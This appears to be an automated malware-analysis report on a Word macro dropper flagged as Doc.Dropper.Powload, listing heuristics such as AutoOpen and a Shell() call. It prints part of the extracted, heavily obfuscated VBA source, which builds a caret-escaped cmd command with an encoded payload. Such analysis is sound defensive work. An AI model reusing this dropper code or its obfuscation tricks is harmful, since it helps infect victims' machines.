MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a critical heuristic firing for a Shell() call within VBA macros, indicating an attempt to execute arbitrary commands. The AutoOpen macro marker further suggests automatic execution upon opening. The VBA script appears to be constructing a command-line string, likely for downloading and executing a second-stage payload, as suggested by the ClamAV detection name 'Doc.Dropper.Powload'.
Heuristics 6
-
ClamAV: Doc.Dropper.Powload-6666836-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6666836-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9905 bytes |
SHA-256: 7944d4030b5acf5ab97b1c82dd636f929f969cb7d13b86931784772d09fb3ecc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HqZXCzBjYUosNZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hzhBlkt" Function pZbRcqTzqDt() On _ Error _ Resume _ Next Hour KZplB * azmRaW / 4736 / SphwNh Hour 3081 / Fnhwp * 98538 * ZTvtWc Hour 79248 * cPOEr zZpcjWqV = "md " + "/" + "V^:^ON/" + "C" + Chr(0 + 2 + 0 + 3 + 29) + "^" + "s^e^" Hour 74518 * KZjHiq Hour 17765 * kzUlk Hour 9867 / GaIEpS / RtwLU * oEuSf Hour 60726 / iJhAQ SLpVhn = "t ^f" + "^M=A" + "^AC" + "^" + "A" Hour IdZUH * qlsio Hour tZTEZE * RWErQ / 60856 * FKzAs Hour pEENZ * LLiwKc itOQwVNTt = "^" + "g^A^AI^" + "AAC" + "A^g^A^" + "AI^A" + "^" + "ACA^g" + "A^A^I" + "^AAC^" + "A^gA" + "AI^A^AC" + "A" Hour 85309 * ZhEbwk Hour dwURzI * uHLwNJ Hour 37370 * ouUvG Hour 91834 * sKRsb / MaYrr / lOtlY wICXBF = "gAA^IA^" + "ACAg" + "^AQ^" + "fA^0" + "H^A^7^" + "BA^aA^" + "M^G^A" + "0" + "B^Q^Y^" + "AMGA9B" + "^" Hour duOjnC * 32315 / 59202 * OcrioR Hour 56526 / JrKGpv / dUwbXZ * coziM EajOXIHVVFO = "wO^A" + "s" + "G^AhBQZ" + "AI" + "HAi^B" + "w^O" + "^" + "A^4^G" + "A1^B" + "g^e^" + "A^QC^Ag" pZbRcqTzqDt = zZpcjWqV + SLpVhn + itOQwVNTt + wICXBF + EajOXIHVVFO Hour tZwii * jvfLYK * wdtoN * fYcZX Hour VzXIUT / PWimG Hour 87949 / Ttfiw / LONrj * tdQzaD Hour 33882 * Hkohs / OZrHH * HsHfww End Function Function juFKY() On _ Error _ Resume _ Next Hour 17892 * ksUlF * 65696 * 21906 Hour XWrFwz / vHiOcK * iuoiE / 18889 bQiAWDnz = "A" + "Qb" + "^" + "A^U^G" + "A0^B" + "Q^S^A0C" Hour OFHMbM * NwjUM Hour 31768 / vXndAb / SGIVzj / hFmVA Hour 23607 / cZhtz / hRfQYP / FKcBl Hour LHLid * RCJOv YjdTi = "Al^B^" + "wa^A" + "^" + "8G" + "A^2^" + "B^" + "g" + "bAk" + "^EA^7AQ" + "K" Hour XwaOfb * bvJOHM / jMJZwB * wuWCNV Hour zamWu * LvsRpz Hour 55050 / 15880 / 75326 * TPfHQ Hour wiPTUn * aWjocW GzYfmH = "^A4GA" + "^1^B^" + "geA^Q" + "CAg^AA^" + "L^" Hour 16018 / SOPvC Hour YEDMR / Yowbz / rEDlms * 15928 McZZSccJzOB = "A8^" + "GA^p^Bg" + "T^A^QCA" + "o^AQ^" + "Z^A^w" + "^GAp^B^" + "g" Hour 19232 * 28750 Hour 82833 * LYPOZ Hour ijBJz / OLuUXv pXIhAQmc = "R^" + "AQ^G^" + "Ah^Bwb" + "A^w" + "GA^u^" Hour 55671 / aUaiQF / 30301 * 40812 Hour 12269 / pzWDRh * 9900 / nPcqi Hour NWvQBS / nhMsd * BitVjw * hfrtU CYDlvsGprlD = "B" + "wd^A" + "8^G" + "A^E^" + "B^" + "gL^" + "AQ^FA^" + "a^BQ" Hour 43604 * JiqjQ Hour 45023 * jhBQW / 39003 / 67252 Hour 70768 / zirNQ / vjwVop / 82198 Hour iZEXjj / PNhiB / 92218 * 510 Hour IYTwSw / BiAIm / 9131 * aNPzZ EBKkn = "VAQ" + "CA^7B" + "^Q^e^A" + "^I^HA0B" + "weA^kC" + "^AB^B^w" Hour 85177 / qkKia Hour 88045 * 66826 Hour 81990 * YIZsR Hour CtXjwS / zcNNH aiIiaPwJjF = "V^A^Q^" + "E^AkAA" + "I^A" + "4G^" + "A" + "^p^BAIA" + "8^G^" + "Ap^B^" + "g^TAQ" Hour 35779 / MBJhF / Nfiiq / KikSn Hour pBFJI * rvZmD * RCjSf * lJjVJ Hour lUBbWv / YOhoH / OrZCUu / hwNmjR Hour oFVbGN * ifiUs / 14935 / oCqlsj DZXBVvP = "C^" + "A" + "^oA^A^a" + "^AMG^Ah" + "^" + "B^Q^" + "ZA" + "I^H" Hour 89824 / 62643 / oHATAZ / qObHTm ObcwPbsjjq = "^AvB" + "^" + "gZAsD" + "^AnA^QZ" + "A^g^H^A" + "^lB^g" + "^L^A" + "cCAr" + "^A" juFKY = bQiAWDnz + YjdTi + GzYfmH + McZZSccJzOB + pXIhAQmc + CYDlvsGprlD + EBKkn + aiIiaPwJjF + DZXBVvP + ObcwPbsjjq Hour oGOsF / 49793 Hour ZLQiX / 74257 Hour 44610 * fNadbj Hour 57259 * lzzdvq End Function Function wUdRSqs() On _ Error _ Resume _ Next Hour LffJBd / zjNzk / 69488 * wojtq Hour UizXBO / itLnkp / dlAEB / dUQLsH FpAcmiRcsJ = "g^dAU^F" + "AzB" + "AJ^AsCA" + "nA^A^" + "X" Hour fdjLD / CnGRzM * bbwRW * UFAcjK Hour afjUSz * mfujM CzThirVjkzE = "AcC^ArA" + "^wYA^k^" + "GAs^B" + "^g" + "Y^A" + "^U^H^Aw" + "Bg^" + "OAY^H^" + "A^u^" + "B" + "Q^Z^" + "A^QC^A" Hour 95436 * DAXwiJ DEWvjoYWn = "9" + "A^g" + "^bA" + "^UH^" + "A6^BA" Hour ERpmYP / ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.